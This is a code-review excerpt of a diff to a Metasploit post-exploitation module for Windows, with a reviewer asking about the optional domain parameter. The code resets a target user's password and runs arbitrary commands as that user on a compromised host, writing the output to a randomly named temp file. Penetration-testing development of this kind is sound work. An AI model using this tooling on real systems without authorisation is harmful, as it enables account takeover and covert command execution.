modules/post/windows/manage/run_as.rb

```diff
@@ -44,130 +46,83 @@ def initialize(info={})
+  end
 
+  def run
     # Make sure we meet the requirements before running the script, note no need to return
     # unless error
-    return 0 if session.type != "meterpreter"
+    return unless session.type == "meterpreter"
 
+    pi = nil
     # check/set vars
     setpass = datastore["SETPASS"]
     cmdout = datastore["CMDOUT"]
     user = datastore["USER"] || nil
-    pass = datastore["PASS"] || nil
+    password = datastore["PASSWORD"] || nil
     cmd = datastore["CMD"] || nil
-    rg_adv = session.railgun.advapi32
+    domain = datastore['DOMAIN']
 
-    # reset user pass if setpass is true
-    if datastore["SETPASS"]
+    if setpass
       print_status("Setting user password")
-      if !reset_pass(user,pass)
-        print_error("Error resetting password")
-        return 0
-      end
+      fail_with(Exploit::Failure::Unknown, 'Error resetting password') unless reset_pass(user, password)
     end
 
-    # set profile paths
-    sysdrive = session.sys.config.getenv('SYSTEMDRIVE')
-    os = @host_info['OS']
-    profiles_path = sysdrive + "\\Documents and Settings\\"
-    profiles_path = sysdrive + "\\Users\\" if os =~ /(Windows 7|2008|Vista)/
-    path = profiles_path + user + "\\"
-    outpath =  path + "out.txt"
+    system_temp = get_env('WINDIR') << '\\Temp'
+    outpath = "#{system_temp}\\#{Rex::Text.rand_text_alpha(8)}.txt"
 
-    # this is start info struct for a hidden process last two params are std out and in.
-    #for hidden startinfo[12] = 1 = STARTF_USESHOWWINDOW and startinfo[13] = 0 = SW_HIDE
-    startinfo = [0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0]
-    startinfo = startinfo.pack("LLLLLLLLLLLLSSLLLL")
+    # Create output file and set permissions so everyone can access
+    touch(outpath)
 
-    #set command string based on cmdout vars
     cmdstr = "cmd.exe /c #{cmd}"
     cmdstr = "cmd.exe /c #{cmd} > #{outpath}" if cmdout
+
     # Check privs and execute the correct commands
-    # if local admin use createprocesswithlogon, if system logonuser and createprocessasuser
+    # if user use createprocesswithlogon, if system logonuser and createprocessasuser
     # execute command and get output with a poor mans pipe
-
     if priv_check
-      if @isadmin #local admin
-        print_status("Executing CreateProcessWithLogonW...we are Admin")
-        cs = rg_adv.CreateProcessWithLogonW(user,nil,pass,"LOGON_WITH_PROFILE",nil, cmdstr,
-          "CREATE_UNICODE_ENVIRONMENT",nil,path,startinfo,16)
-      else #system with correct token privs enabled
-        print_status("Executing CreateProcessAsUserA...we are SYSTEM")
-        l = rg_adv.LogonUserA(user,nil,pass, "LOGON32_LOGON_INTERACTIVE",
-          "LOGON32_PROVIDER_DEFAULT", 4)
-        cs = rg_adv.CreateProcessAsUserA(l["phToken"], nil, cmdstr, nil, nil, false,
-          "CREATE_NEW_CONSOLE", nil, nil, startinfo, 16)
+      print_status("Executing CreateProcessAsUserA...we are SYSTEM")
+      pi = create_process_as_user(domain, user, password, nil, cmdstr)
```

Comment:
So do we not want to allow the domain as optional anymore? It looks like it used to be?